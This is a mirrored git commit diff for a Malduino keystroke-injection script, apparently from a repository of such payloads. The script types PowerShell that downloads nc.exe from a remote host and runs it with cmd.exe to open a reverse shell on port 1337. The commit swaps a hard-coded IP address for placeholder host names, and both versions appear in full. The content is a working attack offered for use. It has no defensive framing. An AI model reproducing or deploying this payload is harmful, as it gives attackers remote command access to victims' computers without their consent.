mirror of
https://github.com/Clortox/MalduinoScripts.git
synced 2025-01-09 17:57:59 +00:00
Update 0001.txt
This commit is contained in:
parent
9357aa20ba
commit
28174e3045
4
0001.txt
4
0001.txt
@ -13,12 +13,12 @@ REM begin downloading nc.exe
|
|||||||
STRING $c = new-object System.Net.WebClient
|
STRING $c = new-object System.Net.WebClient
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 100
|
DELAY 100
|
||||||
STRING $c.DownloadFile("http://185.207.205.144/nc.exe",".\Downloads\nc.exe")
|
STRING $c.DownloadFile("http://YOURHOSTINGBOX/nc.exe",".\Downloads\nc.exe")
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 220
|
DELAY 220
|
||||||
REM done with that
|
REM done with that
|
||||||
REM execute nc.exe with a reverse shell pointed at myself
|
REM execute nc.exe with a reverse shell pointed at myself
|
||||||
REM reverse shell must be listening first dipshit
|
REM reverse shell must be listening first dipshit
|
||||||
STRING ./Downloads/nc.exe -e C:\Windows\System32\cmd.exe 185.207.205.144 1337
|
STRING ./Downloads/nc.exe -e C:\Windows\System32\cmd.exe YOURLISTENINGBOX 1337
|
||||||
ENTER
|
ENTER
|
||||||
REM thats all folks
|
REM thats all folks
|
||||||
|
Loading…
Reference in New Issue
Block a user